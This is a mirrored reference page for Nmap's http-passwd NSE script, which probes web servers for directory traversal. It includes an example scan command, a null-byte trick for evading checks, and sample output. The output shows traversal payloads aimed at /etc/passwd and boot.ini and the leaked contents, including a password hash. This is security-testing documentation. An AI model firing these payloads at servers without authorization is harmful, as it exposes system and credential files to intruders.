HOME>>>>>>>>>

File http-passwd

脚本使用类型: portrule
脚本所属分类: intrusive, vuln
脚本下载地址: http://nmap.org/svn/scripts/http-passwd.nse

User Summary

Checks if a web server is vulnerable to directory traversal by attempting to retrieve /etc/passwd or \boot.ini.

The script uses several technique:

Script Arguments

http-passwd.root

Query string tests will be done relative to this path. The default value is /. Normally the value should contain a leading slash. The queries will be sent with a trailing encoded null byte to evade certain checks; see http://insecure.org/news/P55-01.txt.

smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername

See the documentation for the smbauth library.

http.max-cache-size, http.max-pipeline, http.pipeline, http.useragent

See the documentation for the http library.

Example Usage

执行格式

nmap --script http-passwd --script-args http-passwd.root=/test/ <target>

Script Output

80/tcp open  http
| http-passwd: Directory traversal found.
| Payload: "index.html?../../../../../boot.ini"
| Printing first 250 bytes:
| [boot loader]
| timeout=30
| default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
| [operating systems]
|_multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect


80/tcp open  http
| http-passwd: Directory traversal found.
| Payload: "../../../../../../../../../../etc/passwd"
| Printing first 250 bytes:
| root:$1$$iems.VX5yVMByaB1lT8fx.:0:0::/:/bin/sh
| sshd:*:65532:65534::/:/bin/false
| ftp:*:65533:65534::/:/bin/false
|_nobody:*:65534:65534::/:/bin/false

Requires


Author: Kris Katterjohn, Ange Gutek

License: VER007 整理 http://www.ver007.com